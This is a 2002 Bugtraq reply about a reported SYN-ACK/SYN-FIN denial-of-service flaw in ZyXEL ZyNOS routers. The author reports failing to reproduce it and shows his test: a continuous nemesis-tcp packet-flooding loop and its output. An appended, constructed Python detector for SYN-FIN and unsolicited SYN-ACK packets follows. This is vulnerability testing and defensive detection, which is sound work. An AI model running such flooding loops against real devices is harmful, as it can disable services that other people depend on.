Bugtraq mailing list archives
Re: ZyXEL 642R(-11) AJ.6 SYN-ACK, SYN-FIN DoS
From: Rich Henning <seclsts () fast net>
Date: Mon, 17 Jun 2002 13:02:54 -0400
On Mon, Jun 17, 2002 at 02:59:11PM +0200, Kistler Ueli wrote:
ZyXEL Prestige 642R-11 AJ.6 has a problem handling special packets. It is possible to send a packet that will make unavailable the router's services (Telnet&FTP, DHCP service not tested). Network traffic isn't stopped. Possibly more ZyNOS based routers are vulnerable. Please reply if you found any other ZyNOS based router vulnerable.
I was unable to reproduce this behavior on my Zyxel 643 ADSL router, even under extremely heavy (continuous) SYN|ACK packet flooding to several ports. Excerpt of one such test session follows, concluded with ZyNOS information.

Immediately after single-packet, during continuous bombardment, and afterwards, I was able to access the configuration menu via telnet. The FTP and HTTP services are disabled on my router, and the only firewall rule is to protect the SNMP Service of the Zyxel itself from the WAN side, as I have a linux 2.4/netfilter box that protects the LAN side of the internal network.

Thanks for the heads-up Kistler!

---
# while /bin/true; do nemesis-tcp -v -fS -fA -S xxx.xxx.xxx.xxx -D yyy.yyy.yyy.yyy -y 40023 -d eth0; done
[ ...repeatedly... ]

TCP Packet Injection -=- The NEMESIS Project 1.32
Copyright (C) 1999, 2000, 2001 Mark Grimes <obecian () packetninja net>
Portions copyright (C) 2001 Jeff Nathan <jeff () wwti com>

[IP] xxx.xxx.xxx.xxx > yyy.yyy.yyy.yyy
[MAC] 00:90:27:62:5A:D6 > 0D:0E:0A:0D:00:01
[Ports] 42069 > 40023
[Flags] SYN ACK
[TCP Urgent Pointer] 2048
[Window Size] 512
[ACK number] 420
[Sequence number] 420
[IP ID] 0
[IP TTL] 254
[IP TOS] 0x18
[IP Frag] 0x4000
[IP Options]

Wrote 54 byte TCP packet through linktype 1

TCP Packet Injected
---

ZyNOS F/W Version: V2.50(AY.1) | 9/19/2001
ADSL Chipset Vendor: Alcatel, Version 3.6.70
Standard: G.DMT

--
[ rich henning ]          /"\
[ henninrp () fast net ]  \ /
                           X   support the ascii ribbon campaign against html e-mail
                          / \
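
Added example (not part of the original post or of the Bugtraq thread): a small detector for the two packet types named in the subject line, SYN-FIN and SYN-ACK segments that answer no handshake the device opened, run over a tcpdump-style capture taken in front of a router's management ports. The capture lines, the addresses (documentation ranges) and the function names are constructed for illustration.

```python
import re
from collections import Counter

# Constructed tcpdump-style lines; addresses are documentation ranges.
SAMPLE = """\
12:00:00.100000 IP 192.0.2.1.1050 > 203.0.113.9.80: Flags [S], seq 1000, win 8192, length 0
12:00:00.150000 IP 203.0.113.9.80 > 192.0.2.1.1050: Flags [S.], seq 5000, ack 1001, win 8192, length 0
12:00:01.000000 IP 198.51.100.7.42069 > 192.0.2.1.40023: Flags [S.], seq 420, ack 420, win 512, length 0
12:00:01.000500 IP 198.51.100.7.42069 > 192.0.2.1.40023: Flags [S.], seq 420, ack 420, win 512, length 0
12:00:02.000000 IP 198.51.100.7.42070 > 192.0.2.1.23: Flags [FS], seq 420, win 512, length 0
"""

# tcpdump prints S for SYN, F for FIN and "." for ACK inside the brackets.
LINE = re.compile(r"IP (\S+)\.(\d+) > (\S+)\.(\d+): Flags \[([A-Z.]+)\]")

def classify(lines, protected_ip):
    """Return (kind, source, destination port) for suspect packets sent to protected_ip."""
    pending = set()   # handshakes opened by the protected host (never expired here)
    findings = []
    for line in lines:
        m = LINE.search(line)
        if not m:
            continue
        src, sport, dst, dport, flags = m.groups()
        flags = set(flags)
        if src == protected_ip and flags == {"S"}:
            pending.add((src, sport, dst, dport))   # our own outbound SYN
            continue
        if dst != protected_ip:
            continue
        if {"S", "F"} <= flags:
            # SYN and FIN together never occur in a legitimate connection.
            findings.append(("syn-fin", src, int(dport)))
        elif flags == {"S", "."} and (dst, dport, src, sport) not in pending:
            # SYN-ACK that answers no SYN sent by the protected host.
            findings.append(("unsolicited-syn-ack", src, int(dport)))
    return findings

def summarize(findings):
    """Count findings per (kind, source) so a flood shows up as one row."""
    return Counter((kind, src) for kind, src, _ in findings)

if __name__ == "__main__":
    found = classify(SAMPLE.splitlines(), "192.0.2.1")
    for (kind, src), n in summarize(found).items():
        print(f"{kind:20} from {src:15} x{n}")
```
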